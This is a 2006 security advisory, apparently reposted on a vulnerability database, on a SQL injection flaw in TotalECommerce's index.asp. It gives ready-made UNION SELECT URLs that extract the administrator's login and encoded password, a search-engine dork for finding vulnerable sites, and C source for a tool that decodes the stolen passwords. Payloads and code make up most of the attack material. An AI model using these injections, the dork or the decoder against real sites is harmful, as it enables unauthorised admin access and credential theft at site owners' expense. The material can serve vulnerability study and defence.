Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11701
HistoryMar 05, 2006 - 12:00 a.m.

Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.

2006-03-0500:00:00
vulners.com
17

–Security Report–
Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 04/03/06 04:36 AM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior version must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to id
parameter
in index.asp
Level: Critical

How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with
example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.

Timeline:

  • 04/03/2006: Vulnerability found.
  • 04/03/2006: Could not contact with vendor.
  • 04/03/2006: File closed.

Exploit&Decrypter:
http://www.nukedx.com/?getxpl=18

Dorks: intext:"totalecommerce"

Original advisory: http://www.nukedx.com/?getxpl=18


Decrypter source in C

/*********************************************

  •    TotalECommerce PWD Decrypter        *
    
  •    Coded by |SaMaN| for nukedx         *
    
  •      http://www.k9world.org            *
    
  •          IRC.K9World.Org               *
    

*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main()
{
char buf[255];
char buf2[255];
char buf3[255];
char *texto;
char *vcrypt;
int i,x,z,t = 0;
char saman;
texto = buf;
vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: ");
scanf("%200s", buf);
if (!texto)
vcrypt = "";

for (i = 0; i < strlen(texto); i++)
{
if ((vcrypt == "") || (i > strlen(texto)))
x = 1;
else
x = x + 1;
t = buf[i];
z = 255 - t;
saman = toascii(z);
snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250);
}
printf("Result: %s\n", buf2);
return;
}
β€”End of codeβ€”
Greets to: |SaMaN|